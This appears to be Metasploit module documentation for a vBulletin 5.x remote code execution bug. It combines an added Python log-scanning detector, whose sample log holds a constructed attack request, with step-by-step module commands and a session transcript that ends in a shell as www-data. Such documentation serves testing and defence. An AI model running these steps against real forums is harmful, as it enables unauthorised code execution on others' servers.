Vulnerable Application
vBulletin is a popular PHP bulletin board and blog web application. This module has been tested successfully against vBulletin 5.6.2 running on Ubuntu Linux 19.04.
Description
This module exploits a logic bug within the template rendering code of vBulletin 5.x. The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument, which causes the former template to load the latter and bypasses the filters originally put in place to address 'CVE-2019-16759'. This allows the exploit to reach an eval call with user-controlled input, giving the module PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.
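As an added example (not part of the module or its documentation), the following Python routine triages web server request logs for the combination the description calls out: a render of the 'widget_tabbedcontainer_tab_panel' template together with a 'widget_php' argument. Either indicator on its own is ordinary vBulletin traffic; the pairing is what warrants a look. The log lines, the /EXAMPLE_RENDER_ENDPOINT/ path and the 'template' query parameter are constructed placeholders and are not the module's real request layout; the decoding step is there because URL encoding (including double encoding) would otherwise hide the indicator strings.

```python
import re
from urllib.parse import unquote_plus

# Indicators taken from the module description on this page.
TEMPLATE_NAME = "widget_tabbedcontainer_tab_panel"
INJECTED_ARG = "widget_php"

# Combined-log request line: client, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not real traffic). The endpoint path and the
# 'template' parameter are placeholders, not the module's request format.
SAMPLE_LOG = """\
10.0.0.5 - - [09/Aug/2020:06:29:50 -0500] "GET /forum/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Aug/2020:06:29:57 -0500] "POST /EXAMPLE_RENDER_ENDPOINT/?template=widget_tabbedcontainer_tab_panel&widget_php=phpinfo%28%29 HTTP/1.1" 200 812 "-" "python-requests/2.24"
10.0.0.5 - - [09/Aug/2020:06:30:02 -0500] "GET /EXAMPLE_RENDER_ENDPOINT/?template=widget_tabbedcontainer_tab_panel HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.9 - - [09/Aug/2020:06:30:10 -0500] "POST /EXAMPLE_RENDER_ENDPOINT/?template=widget%5Ftabbedcontainer%5Ftab%5Fpanel&widget%255Fphp=1 HTTP/1.1" 500 0 "-" "curl/7.68"
"""


def decode_layers(text: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of URL encoding so double-encoded
    parameter names still match the plain indicator strings."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def is_suspicious_request(target: str, body: str = "") -> bool:
    """True only when BOTH indicators are present: the tab-panel template
    being rendered and a widget_php argument. One alone is normal traffic."""
    haystack = decode_layers(target + "\n" + body).lower()
    return TEMPLATE_NAME in haystack and INJECTED_ARG in haystack


def scan_log(log_text: str) -> list:
    """Return (ip, method, target, status) for every suspicious request line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious_request(m["target"]):
            hits.append((m["ip"], m["method"], m["target"], m["status"]))
    return hits


if __name__ == "__main__":
    for ip, method, target, status in scan_log(SAMPLE_LOG):
        print(f"[!] {ip} {method} {status} {target}")
```

Access logs only record the request line, so a POST that carries the indicators in its body is invisible to `scan_log`; feed `is_suspicious_request` the captured body (from a proxy or WAF that logs it) via the `body` parameter in that case. The response status is kept in each hit because a 200 on the flagged request, as in the module's session output below, is the case to escalate first.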
Verification Steps
- Do: use exploit/multi/http/vbulletin_widget_template_rce
- Do: set RHOSTS [IP]
- Do: set VHOST [HOSTNAME]
- Do: set LHOST [IP]
- Do: set TARGETURI [PATH]
- Do: set PAYLOAD [PAYLOADNUM]
- Do: run
Options
TARGETURI
The base URI path of vBulletin. Default: /
PHP_CMD
The PHP function to use to execute commands on the target. Default: shell_exec
Scenarios
msf6 > use exploit/multi/http/vbulletin_widget_template_rce
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set VHOST vb.local
VHOST => vb.local
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set TARGETURI /
TARGETURI => /
msf6 exploit(multi/http/vbulletin_widget_template_rce) > set PAYLOAD 5
msf6 exploit(multi/http/vbulletin_widget_template_rce) > run
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
[*] Sending php/bind_perl command payload
[*] Started bind TCP handler against 127.0.0.1:4444
[*] Command shell session 1 opened (0.0.0.0:0 -> 127.0.0.1:4444) at 2020-08-09 06:29:57 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)